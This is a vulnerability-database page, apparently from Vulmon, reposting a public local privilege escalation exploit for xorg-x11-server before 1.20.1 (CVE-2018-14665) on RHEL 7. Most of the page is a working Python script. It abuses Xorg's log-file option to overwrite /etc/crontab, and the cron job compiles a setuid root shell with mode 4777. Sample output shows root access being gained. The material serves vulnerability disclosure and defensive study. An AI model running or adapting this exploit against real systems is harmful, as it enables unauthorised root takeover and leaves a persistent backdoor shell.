Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

xorg-x11-server < 1.20.1 - Local Privilege Escalation

Related Vulnerabilities: CVE-2018-14665  
Publish Date: 13 Nov 2018
Author: bolonobolo
Source / Download Exploit 
                							

                # Exploit Title: xorg-x11-server &lt; 1.20.1 - Local Privilege Escalation (RHEL 7)
# Date: 2018-11-07
# Exploit Author: @bolonobolo
# Vendor Homepage: https://www.x.org/
# Version: 1.19.5
# Tested on: RHEL 7.3 &amp;&amp; 7.5
# CVE : CVE-2018-14665
# Explanation
# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user 
# has to be logged in trought console at the moment the PE script launched.
# In fact during the logged in session of the legitimate non-root user, 
# a file with the name of the non-root user will be created in the /var/run/console folder. 
# With that file present, the same non-root user can launch a Xorg command via SSH. 
# 
# Usage: $ python poc.py
# $ python poc.py 
# [*] Waiting for bolo to connect to the console
# [*] OK --&gt; bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
# 
# ... cut Xorg output ...
# 
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id &amp;&amp; whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#


#!/usr/bin/python
import os
import getpass
import subprocess

userList = []
path="/var/run/console/"

def getWhoami():
	return getpass.getuser()

def getConsole(path):
	p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
	(console, err) = p.communicate()
	consoleList = str.splitlines(console)
	return consoleList

def payload():
	f = open("/tmp/payload", "w")
	payload = ("cp /bin/sh /usr/local/bin/shell\n" 
			"echo \"#include &lt;stdio.h&gt; \" &gt; /tmp/shell.c\n"
   			"echo \"#include &lt;stdlib.h&gt;\" &gt;&gt; /tmp/shell.c\n"
   			"echo \"#include &lt;sys/types.h&gt;\" &gt;&gt; /tmp/shell.c\n"
   			"echo \"#include &lt;unistd.h&gt;\" &gt;&gt; /tmp/shell.c\n"
			"echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' &gt;&gt; /tmp/shell.c\n"
			"gcc /tmp/shell.c -o /usr/local/bin/shell\n"
			"chmod 4777 /usr/local/bin/shell\n")
	f.write(payload)	
	
def executePayload():	
	os.system("chmod +x /tmp/payload")
	os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &amp;")
	print "[*] crontab overwritten"
	os.system("sleep 5")
	os.system("pkill Xorg")
	print "[*] Xorg killed"
	os.system("sleep 120")
	return

def main():
	whoami = getWhoami()
	print "[*] Waiting for " + whoami + " to connect to the console"
	i = 0
	while (i == 0):
		consoleList = getConsole(path)
		for user in consoleList:
			if user == whoami :
				print "[*] OK --&gt; " + user + " console opened"
				i = 1
	print "[*] Building root shell wait 2 minutes"
	payload()
	executePayload()
	print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
	os.system("/usr/local/bin/shell")			

if __name__ == '__main__':
	main()

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started